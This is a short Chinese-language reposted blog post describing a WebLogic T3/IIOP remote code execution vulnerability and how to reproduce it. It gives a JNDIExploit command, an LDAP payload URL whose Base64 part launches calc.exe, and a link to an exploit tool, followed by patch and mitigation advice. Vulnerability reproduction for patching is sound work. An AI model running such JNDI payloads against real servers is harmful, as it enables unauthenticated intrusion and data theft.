欢迎转发,请勿抄袭
Oracle WebLogic Server 产品中存在漏洞。受影响的受支持版本为 12.2.1.4.0 和 14.1.1.0.0。易于利用的漏洞允许未经身份验证的攻击者通过 T3、IIOP 进行网络访问来破坏 Oracle WebLogic Server。成功攻击此漏洞可能会导致对关键数据的未经授权的访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
环境搭建
jdk版本1.8.0_162。
WebLogic Server 版本: 14.1.1.0.0
复现步骤
1、使用 JNDIExploit-1.4-SNAPSHOT.jar利用服务。
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.8.155
2、使用漏洞利用工具weblogic.jar。运行环境在jdk1.8。
3、根据提示填写对应参数。测试payload为弹出计算器
ldap://192.168.8.155:1389/Basic/Command/Base64/Y2FsYy5leGU=
4、发送后检查,ldap请求,成功弹出计算器。
工具获取
https://github.com/dadvlingd/CVE-2024-21006
1、官方修复方案:
当前官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。
链接如下:https://www.oracle.com/security-alerts/cpuapr2024.html
2、临时修复方案:
(1) 用户可通过控制T3协议的访问来临时阻断针对利用T3协议漏洞的攻击。
(2) 用户可通过关闭IIOP协议阻断针对利用IIOP协议漏洞的攻击。
文章声明:该工具、教程仅供学习参考,请勿非法使用。严谨未授权攻击!否则与作者无关!
原文始发于微信公众号(yudays实验室):webLogic远程代码执行利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论